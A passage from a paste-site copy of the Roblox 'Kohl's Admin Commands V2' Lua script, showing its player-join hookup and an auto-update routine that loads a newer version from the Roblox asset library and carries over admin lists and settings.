  7290.  
  7291.  
  7292. 2431.if not tcb then script:Destroy() end
  7293.  
  7294.  
  7295. 2432.game.Players.PlayerAdded:connect(AdminControl)
  7296.  
  7297.  
  7298. 2433.for i, v in pairs(game.Players:children()) do AdminControl(v) end
  7299.  
  7300.  
  7301. 2434.end
  7302.  
  7303.  
  7304. 2435.
  7305.  
  7306.  
  7307. 2436.local mod = game:service("InsertService"):LoadAsset(100808216)
  7308.  
  7309.  
  7310. 2437.if mod:findFirstChild("Kohl's Admin Commands V2") and mod:findFirstChild("Version", true) and AutoUpdate then
  7311.  
  7312.  
  7313. 2438.local newac = mod:findFirstChild("Kohl's Admin Commands V2")
  7314.  
  7315.  
  7316. 2439.newac.Disabled = true
  7317.  
  7318.  
  7319. 2440.local new = tonumber(mod:findFirstChild("Version", true).Value)
  7320.  
  7321.  
  7322. 2441.local old = 0
  7323.  
  7324.  
  7325. 2442.if script:findFirstChild("Version", true) then old = tonumber(script:findFirstChild("Version", true).Value) end
  7326.  
  7327.  
  7328. 2443.if new > old then
  7329.  
  7330.  
  7331. 2444.local adminmod = Instance.new("Model", game.Lighting) adminmod.Name = "KACV2"
  7332.  
  7333.  
  7334. 2445.for i,v in pairs(owners) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Owner" strv.Value = v end
  7335.  
  7336.  
  7337. 2446.for i,v in pairs(admins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Admin" strv.Value = v end
  7338.  
  7339.  
  7340. 2447.for i,v in pairs(tempadmins) do local strv = Instance.new("StringValue", adminmod) strv.Name = "TempAdmin" strv.Value = v end
  7341.  
  7342.  
  7343. 2448.for i,v in pairs(banland) do local strv = Instance.new("StringValue", adminmod) strv.Name = "Banland" strv.Value = v end
  7344.  
  7345.  
  7346. 2449.local prf = Instance.new("StringValue", adminmod) prf.Name = "Prefix" prf.Value = prefix
  7347.  
  7348.  
  7349. 2450.local bv = Instance.new("BoolValue", adminmod) bv.Name = "FunCommands" bv.Value = FunCommands
  7350.  
  7351.  
  7352. 2451.local bv2 = Instance.new("BoolValue", adminmod) bv2.Name = "GroupAdmin" bv2.Value = GroupAdmin
  7353.  
  7354.  
  7355. 2452.local iv = Instance.new("IntValue", adminmod) iv.Name = "GroupId" iv.Value = GroupId
  7356.  
  7357.  
  7358. 2453.local iv2 = Instance.new("IntValue", adminmod) iv2.Name = "GroupRank" iv2.Value = GroupRank
  7359.  
  7360.  
  7361. 2454.local bv3 = Instance.new("BoolValue", adminmod) bv3.Name = "VipAdmin" bv3.Value = VipAdmin
  7362.  
  7363.  
  7364. 2455.local iv3 = Instance.new("IntValue", adminmod) iv3.Name = "ItemId" iv3.Value = ItemId
  7365.  
  7366.  
  7367. 2456.wait()
  7368.  
  7369.  
  7370. 2457.newac.Parent = game.Workspace
  7371.  
  7372.  
  7373. 2458.newac.Disabled = false
  7374.  
  7375.  
  7376. 2459.script.Disabled = true
  7377.  
  7378.  
  7379. 2460.script:Destroy()
  7380.  
  7381.  
  7382. 2461.else
  7383.  
  7384.  
  7385. 2462.CHEESE()
  7386.  
  7387.  
  7388. 2463.end
  7389.  
  7390.  
  7391. 2464.else
  7392.  
  7393.  
  7394. 2465.CHEESE()
  7395.  
  7396.  
  7397. 2466.end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement